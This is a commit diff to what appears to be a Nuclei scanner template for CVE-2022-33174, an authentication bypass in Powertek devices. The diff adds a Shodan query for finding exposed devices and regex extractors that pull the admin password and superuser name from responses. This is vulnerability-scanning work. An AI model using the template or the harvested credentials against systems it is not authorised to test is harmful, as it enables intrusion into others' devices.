Update CVE-2022-33174.yaml

patch-1
Prince Chaddha 2022-07-03 23:05:36 +05:30 committed by GitHub
parent 4e7cccb05b
commit 0f909e8212
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 12 additions and 1 deletions

View File

@ -9,7 +9,10 @@ info:
reference:
- https://gynvael.coldwind.pl/?lang=en&id=748
- https://nvd.nist.gov/vuln/detail/CVE-2022-33174
tags: cve,cve2022,powertek,auth
metadata:
verified: true
shodan-query: http.html:"Powertek"
tags: cve,cve2022,powertek,auth-bypass
requests:
- raw:
@ -29,3 +32,11 @@ requests:
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<sys\.passwd>([A-Z0-9a-z]+)<\/sys\.passwd>'
- '<sys\.su\.name>([a-z]+)<\/sys\.su\.name>'